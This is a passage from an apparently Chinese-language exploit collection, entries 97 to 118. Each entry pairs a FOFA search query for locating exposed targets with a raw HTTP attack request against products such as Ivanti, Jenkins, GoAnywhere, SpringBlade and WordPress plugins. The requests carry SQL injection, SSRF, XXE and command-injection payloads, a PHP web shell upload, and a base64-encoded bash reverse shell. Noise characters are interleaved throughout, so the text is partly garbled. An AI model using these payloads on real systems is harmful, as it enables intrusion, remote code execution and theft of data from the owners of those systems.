4 `$ t/ G) l8 }) t% H; O0 R' D: AgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
3 n% A5 J+ T, o: f( n
4 G8 R+ v; m4 Z4 P97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行; {) A' r3 D! {! j9 B8 R$ @
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
; V: D& X( A) W/ r3 o9 mGET /passport/login/ HTTP/1.1
) a7 K' o: f$ D* [! _Host: 192.168.40.130:80856 L8 I. f* j) M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& a0 e, f' \& g* C$ X, F: C. I% dAccept-Encoding: gzip
2 [2 \2 b! v2 b9 MConnection: close
3 N  D. L% |+ L1 p" n% `Cookie: rememberMe=PAYLOAD' o" ]  t! F6 {. J. {/ ^& [& Y
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"7 V, w" Q4 |# ?9 c3 ]
, X. ]" W: g7 ?) R% g
4 l: |! h7 Z8 X2 r* ?0 m1 d
98. SpiderFlow爬虫平台远程命令执行+ F4 M: J$ h' V3 Z0 |$ O
CVE-2024-01954 u. j. g6 r, B& x) g+ W6 W- p
FOFA:app="SpiderFlow"5 v! t/ ~5 K) s; k2 t# I
POST /function/save HTTP/1.1
2 t" ^1 Y/ `( K8 Q  F* T5 xHost: 192.168.40.130:8088
& [% D' e7 ^, QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ G, P7 C, v  {9 ~2 m3 K
Connection: close  Q4 K6 X- G+ z# L! D; ^
Content-Length: 121) N8 z9 A) r7 `1 B0 e
Accept: */*: g7 @* C/ J& Y3 g2 P4 T4 e  _6 C
Accept-Encoding: gzip, deflate
2 w* L) V- E. Q% w: bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 F* z% M: V" s$ W, F4 [$ u  T5 iContent-Type: application/x-www-form-urlencoded; charset=UTF-8% t3 o4 D) D4 Z) B7 |. B
X-Requested-With: XMLHttpRequest
+ q5 w+ K% `4 g
8 b2 R4 H4 u+ R$ R4 G7 did=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
3 {1 J9 \* ]7 I; p4 X# J1 R; |0 J& F3 q& s6 A- G
' g% ?! F8 z+ U8 i- Z
99. Ncast盈可视高清智能录播系统busiFacade RCE3 d& _; |8 R# |$ p+ k
CVE-2024-03056 Y5 t0 D, `1 D
FOFA:app="Ncast-产品" && title=="高清智能录播系统"& k5 f7 I9 h  C# r# h
POST /classes/common/busiFacade.php HTTP/1.1
) V. C% Z; |) l) I6 y9 L& @  ?Host: 192.168.40.130:8080, k* a* \! A1 J; b; w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' z) \# w; b+ J3 t; r) M
Connection: close
. B' Q# _% {4 GContent-Length: 1541 Q( }' n4 J3 e
Accept: */*
0 l. @  P) p( ?: L/ WAccept-Encoding: gzip, deflate% l1 ?* `7 B6 Z# \5 L& R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 z; i5 `2 r! I$ {
Content-Type: application/x-www-form-urlencoded; charset=UTF-8' E+ `. z1 ^2 K$ A) ]( \3 f
X-Requested-With: XMLHttpRequest" S3 F: N( a7 x

* G$ ~3 L4 R- y1 A%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
* M5 h4 r8 l! h- n" h- f  J' L! w) n- i/ n, B, g" F8 i5 S/ E
( Q/ @+ i3 P% z- G  V' Q
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传; T: y. C# p" U
CVE-2024-0352) L) U! z, ?6 l$ T
FOFA:icon_hash="874152924"! c9 S4 w6 F+ N: i8 x
POST /api/file/formimage HTTP/1.1, q) ~* M6 Y& Y8 d
Host: 192.168.40.130
' |- `9 s2 `6 V4 b1 I* Q4 z* k  oUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 t1 ]1 \7 a3 Q; w4 A3 A" J4 ~7 V
Connection: close' E, n; j% x1 a. [" [$ I) |8 m8 l  {) L
Content-Length: 201
+ N0 r' _  e2 I+ i. ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
" R9 N/ M6 h: RAccept-Encoding: gzip* M: K0 s6 ]- @$ p5 L( D/ G

% X( c/ j0 |5 ~. h------WebKitFormBoundarygcflwtei! C! A: T% {8 H. H& `# t/ z, P
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
& Y6 I: V, S6 i# w  VContent-Type: application/x-php0 P' K+ d4 f! ^6 Q1 }1 u9 J
! `6 ]; b2 k" i% u8 x& V: r
2ayyhRXiAsKXL8olvF5s4qqyI2O. v/ r8 r4 p( d5 x1 B
------WebKitFormBoundarygcflwtei--
3 m% O6 |" q: g1 p" ?4 f" U# N( G
! Q. a6 a1 M8 V
101. ivanti policy secure-22.6命令注入/ T% [" }% [' H' d) ?
CVE-2024-21887
/ T$ e5 `& p3 X% @: R( [5 X6 b, pFOFA:body="welcome.cgi?p=logo"
% i; ?  F$ e2 l# I. \% k/ f% OGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1  Z; r- u3 g- d3 P: N+ i& L
Host: x.x.x.xx.x.x.x3 O2 p+ e. k8 [/ J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
3 A% T% _- g3 n9 h- aConnection: close# Z4 `0 V7 k- j4 f. a* s8 T
Accept-Encoding: gzip4 W; Q2 g2 x% V' v+ C! x0 M

% y+ U# \4 `9 ^6 N+ Y  |
- H$ G, Z; _, N: s6 x# i102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
; X6 D7 E, W0 f* u- B  O+ g$ @( z; ACVE-2024-21893
" w& B# y4 n4 P" U" u& k+ YFOFA:body="welcome.cgi?p=logo": N" Y/ f2 a7 P/ o& U! e
POST /dana-ws/saml20.ws HTTP/1.1+ K$ K7 _+ `: {, C1 L: b
Host: x.x.x.x6 q; y" J/ q+ Q0 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 Y( ]! {% Q3 L' l! h
Connection: close
  c! t/ N1 W8 b- lContent-Length: 792% Q, j1 C. G2 x1 p) m& m
Accept-Encoding: gzip
$ L+ m; ]! z0 C) d$ G3 x+ @& h: @0 S& N6 A  |# k
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>+ z/ n% o: r6 W* K. A

' @* ^$ j: A7 h103. Ivanti Pulse Connect Secure VPN XXE# h8 I  w$ |4 U* @
CVE-2024-22024' t' B5 m0 q4 `. `: C) V8 ]% |
FOFA:body="welcome.cgi?p=logo"- B$ C" K. ^6 u0 w- K* J
POST /dana-na/auth/saml-sso.cgi HTTP/1.1  T8 m* P2 a5 l$ _5 D. a0 W
Host: 192.168.40.130:1119 `* ^% G7 ]1 f  s0 k
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36. B1 F4 g* W9 T( z) {( B/ i' J
Connection: close
$ n% m$ R6 L" l! n6 ^+ n0 }) K4 HContent-Length: 204, I! v/ o& `6 n3 ?8 a* ?
Content-Type: application/x-www-form-urlencoded, Y, h7 M1 I9 l: u  R3 R
Accept-Encoding: gzip' r3 \1 H+ _6 R
' g7 o& W* s' Q0 g; f" |; h
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
* m- v9 ], C. B5 c" S. Y2 I7 ?+ ]1 r6 e# ^8 T  b

' y( X. m4 |: ]6 f7 v5 v其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
3 k/ F  Q: H3 l9 G7 _& W6 K<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>- }6 ]* b" D6 F3 h2 o

0 p. z' w. X5 O$ y
3 {1 f) z, D$ H. L$ b104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
, o2 Z1 H3 [+ Q8 MCVE-2024-0569
0 U, I! ]# W3 y0 {% ]/ Y& YFOFA:title="TOTOLINK"
, Q) s4 _& V: _8 ~POST /cgi-bin/cstecgi.cgi HTTP/1.1
/ h, W6 V% T7 m7 dHost:192.168.0.1
$ I% N/ }0 y& lContent-Length:412 W9 N8 A0 u2 ^. c# B5 J
Accept:application/json,text/javascript,*/*;q=0.01: V/ w3 a3 q8 O( e+ M0 I
X-Requested-with: XMLHttpRequest
4 ?/ o. z6 K% N2 L' |: A0 |' iUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
0 Q  B$ Y0 n5 w% `" l( O& pContent-Type: application/x-www-form-urlencoded:charset=UTF-81 `2 q/ w7 P6 ^1 n6 ^9 Z+ N9 x( n4 V
Origin: http://192.168.0.1
$ n$ S3 z& A, z& ?# j7 y& B$ SReferer: http://192.168.0.1/advance/index.html?time=1671152380564
0 p& b$ I( B& D( @5 bAccept-Encoding:gzip,deflate
0 z! t0 `7 Z. }: ?; @3 a7 qAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
# ~$ Y* b% s( `. O4 ]; H' e7 HConnection:close! ]) a. p: f- W" A6 p0 ]
3 j2 c- P7 O- b7 g5 B+ ?
{
' P# z1 W/ E/ X"topicurl":"getSysStatusCfg",
8 @4 |+ M% ?, F8 J"token":""* B2 y* X/ }  x4 v, v
}: r5 q3 s( S, L% M6 M
5 \3 r! m$ H/ }7 L( X: T
105. SpringBlade v3.2.0 export-user SQL 注入
( i5 Y5 k0 x- x3 J* AFOFA:body="https://bladex.vip"
$ L: B. R% `7 N# F) Zhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
5 T3 {9 l4 d" ^
7 A9 i$ K: m; I6 [5 l' [106. SpringBlade dict-biz/list SQL 注入6 b5 B9 ^% j; F6 b2 U2 l
FOFA:body="Saber 将不能正常工作"
% a% n, S% m! H  ?# {GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1/ M1 m" F! H) n/ K
Host: your-ip
2 ?- w- v' x3 Q, s, H' vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& |" U4 C0 O5 LBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A, E& a4 _$ q9 Y- p' l/ g* W7 p3 c
Accept-Encoding: gzip, deflate# v, ~( V& e8 O0 k, z# `; Z/ v
Accept-Language: zh-CN,zh;q=0.95 I$ c3 Z: y' D- }$ q  A! W
Connection: close8 V5 d5 V2 }* Q0 M  s

! ]% _  l6 U1 w& h' j7 c; a1 j. T. u$ Q, m9 Q
107. SpringBlade tenant/list SQL 注入
: J5 L0 }4 U# |1 i1 tFOFA:body="https://bladex.vip"  D! R4 J8 O# M' |& T
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
3 B4 w% ~( d- i3 ?' mHost: your-ip
( u2 ]5 ~2 m" [1 A: pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- G8 `  j. A4 ~) BBlade-Auth:替换为自己的+ {' c' r* y$ B7 {$ q! S) N
Connection: close. w" H. r; O) ~" Q. f4 C8 D
4 f- U: Y$ s; K* v' D

( P  A! W8 ~, H5 Y6 e2 c  D+ O108. D-Tale 3.9.0 SSRF
& ^% s* Q* E' ~2 ]( r' A" fCVE-2024-21642! ?, F7 G$ }5 K: O) f
FOFA:"dtale/static/images/favicon.png"
) M+ v# I* M6 F' f' hGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1! q) b6 `  t0 s/ [' e" H. k# [
Host: your-ip# X  m/ o, [, B2 X# P
Accept: application/json, text/plain, */*
' ?* }+ d! k' NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( w7 U9 v% K, g( W6 W$ P' s
Accept-Encoding: gzip, deflate$ X. V$ m/ G8 N- e  S3 j
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ {( h  T  |* m5 PConnection: close
4 @# _- c% C& l: j1 p1 b6 G- B4 w, l- e2 ^5 E4 i) }

: U/ d8 B; u. Q( W- u2 r3 X109. Jenkins CLI 任意文件读取; B6 e4 y9 K2 {: C' B2 K4 i
CVE-2024-23897
. ~$ i$ `* d; [$ OFOFA:header="X-Jenkins"
! C$ r+ P4 t0 P) ?  hPOST /cli?remoting=false HTTP/1.15 v7 O6 G/ v- b. Q' ]
Host:/ n- |4 h1 ?4 j) Q6 K1 w: l
Content-type: application/octet-stream
* r# y5 D. V$ i- j5 X/ qSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
; E# T" o! ]' t% U- x7 U& ISide: upload' ?' s9 G# Y2 V+ N9 r
Connection: keep-alive
! N6 J. {- B. U6 r1 T3 u) F8 h5 |Content-Length: 1630 f" u& D9 ~) Z8 \& A7 S& [+ ^7 h

( B, a3 ?3 Y5 o/ ~& Q, D, fb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
3 k7 }0 @( W1 X8 s: g
! g. D5 R. Q& p; R. b/ J  Z$ w( l% i, B
POST /cli?remoting=false HTTP/1.15 `4 d# }5 V; t" E1 F" C
Host:
" f& x( k  g) E; R% VSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
* s0 A( ?+ h2 b0 E8 c* sdownload+ @4 I  y* S% A$ s3 {
Content-Type: application/x-www-form-urlencoded: V* j% `5 H" q  V
Content-Length: 08 P+ h. v. z# k: G2 w

1 e! c! ~& g+ V6 D% M) e6 p! v& R% V/ V7 T$ l* A. t# J
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin# j1 U/ z7 x2 x- _  W( g' `
java -jar jenkins-cli.jar help; p1 y+ f! B/ i- q$ D# V8 `
[COMMAND]: H) E) s/ N9 Q3 _1 J! B9 e: E
Lists all the available commands or a detailed description of single command.7 V* f$ P0 i( s9 u
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)6 S2 J, v+ X$ ^' c0 v$ d( W
* X5 a6 x5 D4 z, n0 g3 ]$ x: u3 k

5 K3 {7 V; q5 o8 E- }& u* s110. Goanywhere MFT 未授权创建管理员
7 H: u  t+ B; z6 U8 o9 {0 cCVE-2024-0204
& ?( e) E! m, v9 l; [FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
9 A; L$ H3 G- w5 x) gGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1, ^8 r: c9 c# }9 g4 R& B+ M
Host: 192.168.40.130:8000$ o, Z" @8 o  Z: L, i
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
- I1 k: |! u: C. M* n( }0 ^7 IConnection: close
  |. m4 z/ x7 k! yAccept: */*! Q! P' x4 f1 e, U$ W
Accept-Language: en
# x, j& f! k1 x; u! }- s% }7 [Accept-Encoding: gzip  O- L/ U! u- D9 K2 \5 P% a
$ v+ a! n" w" M' c
( C  ~+ t1 O  X9 s
111. WordPress Plugin HTML5 Video Player SQL注入
8 o, s8 ^, B* B$ X, _CVE-2024-1061
; C. W' P) y  V4 @/ xFOFA:"wordpress" && body="html5-video-player"
4 g4 O+ j: d. Q3 o6 e- w* n0 YGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
" R  Y  T) \" z/ t# m9 P& kHost: 192.168.40.130:112
% y0 Z% T3 q+ k) m) p1 ?8 `. _User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
4 Z& x0 r: F! c' A3 HConnection: close
; N* T4 b0 i0 K$ j% f/ l0 t# iAccept: */*
- \1 c# V0 ]" D7 N. o* v) O5 S+ oAccept-Language: en2 k) v% o* N5 {7 ~# t! o. o+ O
Accept-Encoding: gzip+ t& m2 x! e: g+ Q, A! e
  m. Z7 `5 s" }6 t

* Y3 i  o* }: f9 U% P112. WordPress Plugin NotificationX SQL 注入; N9 t; q2 N' w8 L  A
CVE-2024-1698
2 w4 ]' x5 Z& @6 `% E% [; ^FOFA:body="/wp-content/plugins/notificationx"
! E% h8 s$ L0 O- ^& ~& bPOST /wp-json/notificationx/v1/analytics HTTP/1.13 D+ H: A: T+ b, R
Host: {{Hostname}}
3 _+ u% Z- \; \' g8 O( w: ?Content-Type: application/json, b0 p0 }3 ^; ]

8 Z+ J. X( m+ E. g! [{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
- k! i1 u  Y& N  K) A( K7 P% g+ }" M- Z& e9 r

3 d# J4 O* j9 J1 H  I& E113. WordPress Automatic 插件任意文件下载和SSRF; d; c$ Q4 p6 p4 G
CVE-2024-279540 H9 ^4 t4 I% S! W6 i
FOFA:"/wp-content/plugins/wp-automatic"
+ e5 @* k3 p6 p' @GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
& y- C8 I& k, f8 dHost: x.x.x.x
  r- f% @* o9 e0 ]) q, O& nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
  Z, A# |- V& }7 HConnection: close- \# }" {. ^- h& s' |% z; c
Accept: */*
" |) d1 W$ r1 V/ ?  j1 d4 d3 oAccept-Language: en
; A) x) O, e* @Accept-Encoding: gzip1 u- l7 H* e2 s
' b- C. [5 K6 n
9 H6 o$ |6 ^) h, x2 u5 l
114. WordPress MasterStudy LMS插件 SQL注入% _) T$ c& b( i! g3 x
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
: m: ?1 z# M: y# ]- G, a( GGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
4 I- g/ s9 n$ {& N5 p3 M! `* fHost: your-ip
1 H  M4 I0 r3 z+ AUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
2 X2 D) r! o/ D% L7 BAccept-Charset: utf-85 Q7 a5 ], \. m
Accept-Encoding: gzip, deflate' t, J/ y3 T- `- X' `3 z' ]
Connection: close
: J/ O1 E* \6 Z6 S) _9 l/ _( |$ p
# Q4 o" p& F$ |" K  {8 H# S1 C8 V# f+ h/ ^+ g  [
115. WordPress Bricks Builder <= 1.9.6 RCE
4 ?# y8 E7 R, M' r) G8 V8 UCVE-2024-25600
( f7 ?9 S' ~9 S4 p6 _FOFA: body="/wp-content/themes/bricks/". ]. i% d+ n2 _" T% V: w
第一步,获取网站的nonce值
' ^- G0 \* z9 uGET / HTTP/1.1
7 @4 i( j# e4 C7 o, ~# @1 {Host: x.x.x.x
: |- E+ [% Y- n) V( IUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
- K# n5 B  ~9 H' g: d9 d2 `, OConnection: close
/ m3 c8 [8 m% q" EAccept-Encoding: gzip& y+ e1 q2 O  [* f3 F5 Z( M, W
  {/ \) [, l" Q4 f. y$ S

* k  b1 T6 g! E第二步替换nonce值,执行命令& g& b* r9 ?2 N" E# u& W
POST /wp-json/bricks/v1/render_element HTTP/1.1
8 I% r4 j' i2 g4 B1 T  ZHost: x.x.x.x# I: {- s- o/ O4 o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' r9 O7 }$ M' i# K% u) XConnection: close
! r8 u; H1 w2 v  _: ^/ _: iContent-Length: 356- I$ W! p2 I( S4 F4 V0 d9 H! Z8 V
Content-Type: application/json
0 }% u2 a1 P9 N" d) ]Accept-Encoding: gzip" w7 f8 G! w6 L2 p

% k3 E# ?7 N7 ~6 R1 ]) n" K* w/ T{3 y8 |/ v* q: {9 W
"postId": "1",9 G3 ]4 F6 S  i$ H, f5 T: n
  "nonce": "第一步获得的值"," f% O3 L  W: `' C+ t1 s
  "element": {0 o: Z' u, ?1 G' Y  D, {- i$ ?
    "name": "container",
+ `! H8 _. N& C+ ]    "settings": {
3 }, g6 B# V: }      "hasLoop": "true",1 E% T6 ^8 ~& @/ z$ Y
      "query": {
4 G4 A3 F7 H; M5 W/ e        "useQueryEditor": true,
1 c# S! M# ]& M2 H        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
) M( h! `9 w( c        "objectType": "post"
0 ~. u( ]* x! l( P8 Z      }( q/ u0 F4 j; H! ^
    }
  ^4 p4 M% B4 z* [& M8 V* ?" U+ b; _" r  }
0 @2 @+ d1 q7 `& {, o- i}( C' c& b" ?. @( m

/ e4 d( P/ B# e
/ X3 O; d. ~" I3 c/ C6 i9 r116. wordpress js-support-ticket文件上传" N0 D6 D0 W6 t( w: x, x, T+ A" W
FOFA:body="wp-content/plugins/js-support-ticket": J' {( M  K* Z% E* V7 H+ c
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1! y" j% ?1 p( G3 s& n$ l* P3 e; O
Host:. a+ @( Y6 T8 C
Content-Type: multipart/form-data; boundary=--------767099171
* X! d4 K' p  r' m: q8 I( OUser-Agent: Mozilla/5.0
' e4 M1 a% [" y0 h& V3 @% |9 G  q3 B$ S* i- w' F0 U
----------767099171/ X5 f, o. ]  ?! C' q0 _
Content-Disposition: form-data; name="action"
5 W3 J5 E6 Q' ^4 Yconfiguration_saveconfiguration
7 l; s# R$ L" `1 D----------7670991715 a2 Y7 }2 h! v
Content-Disposition: form-data; name="form_request"
* r* m3 {" I8 c) s9 Ejssupportticket
8 J7 t% U5 r4 F  s----------767099171
! L8 d3 p) ^" n3 lContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php": r% I" A. i, B! R
Content-Type: image/png
) m) m: T! J8 J----------767099171--/ t6 {0 A% ^+ z) R

0 I- b. e- M/ _2 @' ]4 w3 {1 |' ^, j- B" _' U
117. WordPress LayerSlider插件SQL注入# c. C0 ?  |9 X; e; }: f0 H" M7 n
version:7.9.11 – 7.10.0' D5 v1 U( t. r
FOFA:body="/wp-content/plugins/LayerSlider/"
* p! [; J8 W: h# I( fGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
1 C' `$ i5 L6 K! rHost: your-ip
+ O2 P$ T( s; F; AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 z% r$ A8 R3 Z- F7 [0 r+ i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 ~5 z' d3 X. o5 r/ v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  B5 Y* t4 B1 u: |5 D8 u$ F6 M
Accept-Encoding: gzip, deflate, br% h" D4 w0 s& J% M4 v( l
Connection: close, X" S2 ^  l* @: \
Upgrade-Insecure-Requests: 1
. ]0 n- _3 W/ X* ?/ {; B$ k" H5 y6 R  l7 F7 i4 T7 z% ^' V

7 J5 x3 @6 I( ?* Y" G, |. t% ]118. 北京百绰智能S210管理平台uploadfile.php任意文件上传9 ?# D4 j; U9 e( I( |
CVE-2024-0939
% v" y7 f4 x) C( S. TFOFA:title="Smart管理平台") _# H4 j# o4 o
POST /Tool/uploadfile.php? HTTP/1.1
: t% {: {& _( j7 f  S6 a  L% E4 d1 YHost: 192.168.40.130:8443- w/ N6 h1 R* v* w6 `- Z/ U; T( e
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
9 ]0 Q9 H  x5 i) q- k+ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.04 v* K( I% L( H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; ^  n# e3 F1 Z+ n4 c( P% g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 W8 y/ x( }: W/ _Accept-Encoding: gzip, deflate
. H& I$ ?7 b* f/ M' _7 Y% A8 NContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
; S: Q7 J( f* F3 JContent-Length: 405
/ Q7 E( o0 C2 @; j- yOrigin: https://192.168.40.130:8443$ [. q4 R$ _9 w. J* D  O6 U- B
Referer: https://192.168.40.130:8443/Tool/uploadfile.php* l# d6 Q4 [1 k: v4 A& \5 |* c
Upgrade-Insecure-Requests: 1
, o0 p+ r6 Z/ mSec-Fetch-Dest: document. C9 d9 ^" F. L: M
Sec-Fetch-Mode: navigate
2 o7 }) ]2 d$ D5 q/ l' `& [Sec-Fetch-Site: same-origin
+ a( s! q# Y7 xSec-Fetch-User: ?12 u8 F/ ~$ ?, a
Te: trailers* N0 g) ~2 N- Q. H8 }4 Q
Connection: close
: h, Q; P# {; M+ n; Y" a" `* n& W4 e6 {
-----------------------------13979701222747646634037182887
% a: m5 H. w5 g; g2 N# q4 C1 cContent-Disposition: form-data; name="file_upload"; filename="contents.php"( Y, B! F1 |3 j, R% z* |$ H
Content-Type: application/octet-stream
, i; `2 r& U  D& T+ m( k
3 I; g1 q& I* c5 k<?php2 |+ j* `3 z. N5 F3 m- w
system($_POST["passwd"]);! ]1 U! C/ Y8 ^  y1 v7 G! y
?>
% c' g* {- }% D9 w9 H: l8 D- m-----------------------------13979701222747646634037182887
9 s: `$ g% G2 u& i1 n, kContent-Disposition: form-data; name="txt_path"
. v; P' ^4 X4 x! g4 {3 Q9 C
